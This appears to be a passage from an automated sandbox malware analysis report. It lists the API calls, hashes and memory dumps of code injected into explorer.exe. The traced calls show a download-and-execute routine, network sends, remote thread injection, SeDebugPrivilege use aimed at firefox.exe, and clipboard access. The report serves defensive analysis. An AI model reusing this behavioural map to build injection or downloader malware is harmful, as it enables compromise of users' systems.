                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF1B1B2304AC186DB30EF22E8503EA77A1F748B99F445926CE4A87BD4DBB8D5C4C741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction ID: 4686aaf45dfbb5fef383fe7f08f5f028aa0773d76483b6b7635e196af606aedb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F17472604A82C6DB309F25E8847BA7BA1FF44BC9F845135CA4A47B65DF78E189C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
• Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: 0ac6a821863e37498a53dce0886eb166645e793505a8925b3c8ffe79cf138d0f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87814D76704B818AEB60CF66F8447AEB7A6F788B98F458125DE8D47B18DF38C155CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: e368d888705cc208b17b3d852cd85b209d2e4500e47fbcccb641dbfed9c59141
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4813572705B808AEB20CF62F85479EB7A5F788BA8F440615DE8D57B58DF78C545CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: 7cc299b1c9541dc6bd6c99ceb56c9cab2692c0e626f7b02e6df81767771a6626
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53812C72718B8186EB60DF61E8447AEB7A5FB88B98F404225DE8D87F18DF78D055CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0E10A6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0E10A6D7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcpyA.KERNEL32 ref: 0E106E6E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E7F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E93
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EA7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EB8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106ECC
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EEA
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: wsprintfA.USER32 ref: 0E106F02
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F16
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F2A
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F66
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: WSAStartup.WS2_32 ref: 0E106F76
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: socket.WS2_32 ref: 0E106F92
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: gethostbyname.WS2_32 ref: 0E106FA9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: memcpy.MSVCRT ref: 0E106FC9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: htons.WS2_32 ref: 0E106FD8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: connect.WS2_32 ref: 0E106FEF
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107005
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0E10A751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0E10A76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0E10A785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10A795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10A7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0E10A7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0E10A7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10A807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0E10A835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10A844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction ID: 9473b7fb07fa80d4b7375f97cdb793de5098e85ba1a77939618990005f8978b5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80518F72704B808AEB20CF62E8543DE77A0FB88B89F544815DE9957B98DFB8C585CB01
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0FF4A6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0FF4A6D7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcpyA.KERNEL32 ref: 0FF46E6E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E7F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E93
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EA7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EB8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46ECC
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EEA
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: wsprintfA.USER32 ref: 0FF46F02
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F16
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F2A
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F66
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: WSAStartup.WS2_32 ref: 0FF46F76
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: socket.WS2_32 ref: 0FF46F92
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: gethostbyname.WS2_32 ref: 0FF46FA9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: memcpy.MSVCRT ref: 0FF46FC9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: htons.WS2_32 ref: 0FF46FD8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: connect.WS2_32 ref: 0FF46FEF
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47005
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0FF4A751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0FF4A76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0FF4A785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4A795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4A7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0FF4A7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0FF4A7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4A807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0FF4A835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4A844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4A84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction ID: 29576b5333cf2e16071b3e1f6de848f907f216813759983740c014a2cded0f69
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F511D327146428AFB20DF65E8547AE7BA1FB88B88F844425DE4947E68DF7CD14ACB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0DFA2E31
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32First.KERNEL32 ref: 0DFA2E4F
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32Next.KERNEL32 ref: 0DFA2E6F
                                                                                                                                                                                                                          • Part of subcall function 0DFA2E00: Process32Next.KERNEL32 ref: 0DFA2E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0DFA2F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0DFA2F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0DFA2F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0DFA2FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA2FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0DFA3043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0DFA305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        • Opcode ID: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction ID: 8a75f4702536977c42eb1e90db737b251aff2aac498e6fb4b95cb5f6ebf856ed
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92d3c017761ddc35ab4a79abf2f8234ef70817ffa4ab8ee70b46f9ae014cd1e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8151A662709A4295EB10EBFEE8543ED73A2BB847D8F45C4258E4E57B58EF38C509C350
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0E102E31
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32First.KERNEL32 ref: 0E102E4F
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32Next.KERNEL32 ref: 0E102E6F
                                                                                                                                                                                                                          • Part of subcall function 0E102E00: Process32Next.KERNEL32 ref: 0E102E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0E102F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0E102F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0E102F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0E102FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E102FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0E103043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0E10305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: CreateToolhelp32Snapshot.KERNEL32 ref: 0FF42E31
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32First.KERNEL32 ref: 0FF42E4F
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32Next.KERNEL32 ref: 0FF42E6F
                                                                                                                                                                                                                          • Part of subcall function 0FF42E00: Process32Next.KERNEL32 ref: 0FF42E97
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0FF42F53
                                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0FF42F63
                                                                                                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 0FF42F81
                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0FF42FA9
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF42FB3
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0FF43043
                                                                                                                                                                                                                        • OpenProcess.KERNEL32 ref: 0FF4305A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF4308D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                                                                                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                                                                                                                                                        • API String ID: 3464871389-4009583425
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1677084743-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        • Opcode ID: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction ID: 72cde7bc65f10d941dbc4ef8abcbcf79ccc90186e20ef323d0056364e60fe3c6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2121F53231568086DB24DF16B92079AB6A9FBC8FC4F4480259E8C43B55DF7CC589C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                        • Opcode ID: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction ID: 6a5947ed90fd8e66a0b669341c301c70b6a4b76e789c919bfd3695b10ab2464a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87caab480a9102b640f6cefad6e7ae02b6310e746fb377fb73e684b20f000eaf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C921B17671478185DB31DF16A900BABBA68FF88FD4F8481299E8C43B15DF78D089C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
